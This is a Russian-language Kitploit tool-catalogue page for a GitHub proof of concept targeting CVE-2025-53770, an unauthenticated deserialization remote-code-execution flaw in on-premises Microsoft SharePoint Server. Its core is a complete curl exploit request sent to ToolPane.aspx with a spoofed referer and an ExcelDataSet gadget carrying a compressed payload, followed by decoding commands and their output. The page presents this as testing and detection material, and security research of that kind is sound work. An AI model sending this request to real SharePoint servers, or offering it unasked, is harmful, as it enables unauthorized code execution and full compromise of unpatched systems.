Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-53770 — Эксплойт доказательства концепции для неаутентифицированного удаленного выполнения кода через небезопасную десериализацию в Microsoft SharePoint Server (CVE-2025-53770), с командами извлечения и декодирования полезной нагрузки. | Kitploit
Инструменты/GitHubGitHub/0xray5c68616e37/cve-2025-53770
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHub0xray5c68616e37/cve-2025-53770

cve-2025-53770

Эксплойт доказательства концепции для неаутентифицированного удаленного выполнения кода через небезопасную десериализацию в Microsoft SharePoint Server (CVE-2025-53770), с командами извлечения и декодирования полезной нагрузки.

РепозиторийСайт
311 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-53770 SharePoint Deserialization RCE PoC

Критический — Неавторизованное удаленное выполнение кода через небезопасную десериализацию в Microsoft SharePoint Server (CVE-2025-53770)

Описание

Десериализация ненадежных данных в локальной версии Microsoft SharePoint Server позволяет злоумышленнику удаленно выполнить код и скомпрометировать систему. Microsoft известно об активной эксплуатации уязвимости, и компания готовит комплексное обновление. Убедитесь, что меры защиты из документации по CVE применены.

  • Воздействие: Неавторизованные злоумышленники могут добиться удаленного выполнения кода, что приведет к полной компрометации системы.
  • Серьезность: Критическая

Подтверждение концепции

Следующий PoC демонстрирует, как злоумышленник может использовать уязвимость для извлечения и декодирования вредоносных нагрузок через уязвимую конечную точку.

Целевой домен намеренно заменен на reeaccated.com.

Команда

root@kitploit:~
curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

Вывод

root@kitploit:~
<Info>IntruderScannerDetectionPayload</Info>
изображение

Ссылки

  • Реализация тестовой нагрузки
  • Анализ безопасности от Code White
  • Руководство Microsoft
  • Запись NVD

Воздействие:
Неавторизованные злоумышленники могут использовать небезопасную десериализацию для удаленного выполнения кода на SharePoint Server, что приведет к полной компрометации системы.

Скачать инструмент